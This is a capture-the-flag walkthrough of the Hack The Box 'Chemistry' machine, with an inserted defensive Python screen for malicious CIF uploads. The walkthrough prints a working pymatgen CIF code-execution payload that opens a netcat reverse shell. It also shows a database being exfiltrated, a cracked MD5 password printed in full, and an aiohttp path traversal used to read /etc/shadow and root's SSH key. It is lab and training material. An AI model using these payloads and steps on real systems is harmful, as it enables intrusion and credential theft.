[HTB] Chemistry

OS: Linux
Difficulty: Easy
Author: FisMatHack
Release Date: October 19, 2024

Recon

Nmap

nmap -T4 -A -p- 10.10.11.38 -o initial_scan.nmap
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-04 15:18 WET
Nmap scan report for 10.10.11.38
Host is up (0.072s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b6:fc:20:ae:9d:1d:45:1d:0b:ce:d9:d0:20:f2:6f:dc (RSA)
| 256 f1:ae:1c:3e:1d:ea:55:44:6c:2f:f2:56:8d:62:3c:2b (ECDSA)
|_ 256 94:42:1b:78:f2:51:87:07:3e:97:26:c9:a2:5c:0a:26 (ED25519)
5000/tcp open http Werkzeug httpd 3.0.3 (Python 3.9.5)
|_http-title: Chemistry - Home
|_http-server-header: Werkzeug/3.0.3 Python/3.9.5
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5.0
OS details: Linux 5.0, Linux 5.0 - 5.14
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 71.91 ms 10.10.14.1
2 72.01 ms 10.10.11.38

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.28 seconds
Port   Service
22     SSH
5000   HTTP

HTTP Page

Visiting the HTTP page on port 5000, we find a CIF Analyzer.

After registering, we are able to upload a CIF file.

User

CIF Reverse Shell

If we google for vulnerabilities involving CIF files, we come across this GitHub page explaining a code execution vulnerability triggered when pymatgen parses a CIF file.

We can change the command in the payload to start a reverse shell.

Create a .cif file with the following payload:

data_5yOhtAoR
_audit_creation_date 2018-06-08
_audit_creation_method "Pymatgen CIF Parser Arbitrary Code Execution Exploit"

loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]

_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("busybox nc 10.10.14.25 1337 -e /bin/bash");0,0,0'
_space_group_magn.number_BNS 62.448
_space_group_magn.name_BNS "P n' m a' "

Start a listener:

nc -lvnp 1337

When we click to view the uploaded file, we pop the shell.
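The bug above is a parser that evaluates attacker-controlled text. An added example of the pre-upload screen a CIF Analyzer could run before handing a file to the parser (my code, not the box's app or pymatgen's): it rejects any transformation string that is not a plain a,b,c expression and flags Python introspection tokens anywhere in the file. The two sample CIFs are constructed; the malicious one keeps only the shape of the write-up's payload, with the shell command left out.

```python
import re

# Field whose value pymatgen hands to an expression parser when it builds the
# magnetic symmetry transformation; it gets the strict-grammar check.
TRANSFORM_FIELDS = {"_space_group_magn.transform_BNS_Pp_abc"}

# Strict grammar for a transformation string such as "a,b,c;0,0,0" or
# "-a+c,b,2a+1/2;1/2,0,0": three linear expressions in a,b,c, an optional
# ';' origin shift of three numbers, and nothing else.
_NUM = r"\d+(?:\.\d+)?(?:/\d+)?"
_TERM = rf"(?:(?:{_NUM}\*?)?[abc]|{_NUM})"
_EXPR = rf"[+-]?{_TERM}(?:[+-]{_TERM})*"
TRANSFORM_RE = re.compile(
    rf"^{_EXPR},{_EXPR},{_EXPR}(?:;[+-]?{_NUM}(?:,[+-]?{_NUM}){{2}})?$"
)

# Python introspection and process-spawning tokens that never belong in crystal data.
SUSPICIOUS_RE = re.compile(r"__\w+__|\.(?:system|popen|load_module)\s*\(|\bimport\b")

# One CIF data line: a _tag followed by a 'quoted', "quoted" or bare value.
LINE_RE = re.compile(r"""^(_\S+)\s+(?:'(.*)'|"(.*)"|(\S+))\s*$""")


def parse_tag_lines(text):
    """Yield (tag, value) for single-line tag/value pairs; loop bodies are skipped."""
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if m:
            value = next(v for v in m.groups()[1:] if v is not None)
            yield m.group(1), value


def screen_cif(text):
    """Return a list of findings; an empty list means the file passed the screen."""
    # Defence in depth: scan the whole file, loop bodies included.
    findings = [f"suspicious token {h.group(0)!r} at offset {h.start()}"
                for h in SUSPICIOUS_RE.finditer(text)]
    for tag, value in parse_tag_lines(text):
        if tag in TRANSFORM_FIELDS and not TRANSFORM_RE.fullmatch(value.replace(" ", "")):
            findings.append(f"{tag}: {value!r} is not a plain a,b,c transformation")
    return findings


# Constructed samples: a benign magnetic CIF header, and the shape of the
# write-up's payload with the command removed.
BENIGN_CIF = """data_example
_space_group_magn.transform_BNS_Pp_abc 'a,b,c;0,0,0'
_space_group_magn.name_BNS "P n' m a' "
"""
MALICIOUS_CIF = """data_example
_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__subclasses__()][0];0,0,0'
"""
```

Call screen_cif() on the uploaded bytes decoded as text and reject the upload when the returned list is non-empty; the transformation grammar is deliberately narrower than what pymatgen accepts, so widen it only for fields your users actually need.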

/etc/passwd

Rosa Password

Looking through the web app files, we come across database.db in /home/app/instance.
We can start a Python HTTP server on the target and transfer it to our machine:

python3 -m http.server 1234
wget http://<attackerip:1234>/database.db

We can use sqlite3 to look through the database:

sqlite3 database.db
.tables
select * from user;

Among all the hashes, we find the one for the rosa user, which we know from /etc/passwd is a user on the machine.
These are MD5 hashes, so we can either look the hash up on CrackStation or crack it manually with hashcat:

echo '63ed86ee9f624c7b14f1d4f43dc251a5' > rosa.hash
hashcat -m 0 rosa.hash /usr/share/wordlists/rockyou.txt

rosa:unicorniosrosados

We can now SSH into the machine as rosa:

ssh rosa@10.10.11.38

Root

Site Monitoring Page

If we look at the machine's listening ports, we can see that port 8080 is in use:

netstat -tlnp

Forward port 8080 to your machine and open the page in a browser:

ssh -L 1234:localhost:8080 rosa@10.10.11.38

We can use gobuster to look for directories:

gobuster dir -u http://localhost:1234 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt

We do not have access to the /assets directory, but we will use it later as the anchor point for the path traversal exploit.

CVE-2024-23334

To get more information on the web application, we can use WhatWeb:

whatweb http://localhost:1234

By googling for aiohttp 3.9.1 vulnerabilities, we find this PoC for CVE-2024-23334, a path traversal vulnerability in aiohttp's static file handling.

Edit exploit.sh to try to read the /etc/shadow file, using the /assets directory as the anchor point for the path traversal.

Transfer the exploit to the target machine and run it:

wget http://<attackerip:port>/exploit.sh
chmod +x exploit.sh
./exploit.sh

We could use this to read root.txt and call it a day, but we can also use it to get the root user's private SSH key.
Change the target file in exploit.sh to root/.ssh/id_rsa.

Running the exploit again gives us the root user's SSH key.

Save the key to a file, fix its permissions and log in as root over SSH:

chmod 600 id_rsa
ssh root@10.10.11.38 -i id_rsa

Rooted :)